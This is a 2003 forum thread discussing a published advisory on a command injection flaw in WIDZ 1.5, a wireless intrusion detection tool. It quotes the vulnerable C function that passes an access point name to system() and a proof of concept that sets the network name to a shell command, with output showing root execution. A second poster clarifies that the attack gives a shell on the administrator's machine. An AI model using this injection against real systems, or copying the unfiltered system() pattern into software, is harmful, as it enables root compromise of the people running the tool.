vnet576
Sep 4 2003, 02:24 AM
This looks like a very interesting tool... As far as I understood, it allows you to catch people trying to access your wireless network and it gives you a root shell on THEIR PC. Maybe someone could compile this or knows more about this exploit.
http://www.securiteam.com/unixfocus/5XP0T15AUM.html
| CODE |
Vulnerable systems:
 * WIDZ version 1.5 and prior

Vulnerable code:
do_alert(char *target)
{
    char mess[100];
    if ( DEBUG ) printf("Alert unknown AP %s\n", target);
    sprintf(mess,"Alert 'unknown AP %s\n'", target);
    system(mess);
    // Should do a check to see if we've alerted already but !!!
}
As you can see the function system(mess) is executed without proper filtering, therefore it is possible to cause it to execute arbitrary code.
Go to apple airport and set network name to ';/usr/bin/id; (Use HostAP instead)
snifz0r widz # ./widz_apmon 1 eth1 monitor unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
At this point, the attacker can pretty much do what they wish. As a side note, this is not the only WIDZ program to make use of system() in this manner.
|
hacket
Sep 4 2003, 07:18 AM
heheh,
well this is more for us getting a shell on the admins box; or whatever...
using it you can execute arbitrary code on his machine.
This got nothing to do with getting a shell on ones "bugler"
read the article pal ...!
nice post though....
cya
h4k3t
vnet576
Sep 4 2003, 07:25 PM
I did... maybe I misinterpreted it, but look
| QUOTE |
| allowing you to catch bad guys in action |